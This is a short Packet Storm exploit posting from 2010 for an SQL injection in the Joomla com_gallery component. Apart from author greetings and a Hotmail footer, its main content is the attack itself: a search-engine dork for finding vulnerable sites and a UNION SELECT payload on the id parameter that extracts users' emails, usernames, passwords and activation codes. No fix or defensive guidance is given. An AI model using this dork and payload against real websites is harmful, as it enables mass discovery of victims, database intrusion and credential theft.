Joomla Gallery SQL Injection

2010-05-03T00:00:00
ID PACKETSTORM:89128
Type packetstorm
Reporter HeaDShoT
Modified 2010-05-03T00:00:00

Description

                                        
                                            `  
  
  
# Exploit Title: Joomla Component com_gallery SQL injection vulnerability  
# Date: 02/05/2010  
# Author: HeaDShoT  
# Software Link:  
# Version:  
# Tested on:linux bt  
# CVE :  
# Code :  
##############################################################################################################################  
  
#Email :pw7[at]live[dot]fr  
#dork :inurl:"com_gallery"  
#example:  
#http://site.com/index.php?option=com_gallery&id=[sqli] UNION SELECT 1,concat(email,0x3e,password,0x3e,username,activation),3,4,5,6,7,8,9--  
  
greetz :  
-M4MiM4N  
-l363ND  
-TA3LAb-el-maker  
  
  
  
_________________________________________________________________  
Hotmail : une messagerie performante et gratuite avec une sécurité signée Microsoft  
https://signup.live.com/signup.aspx?id=60969  
  
  
`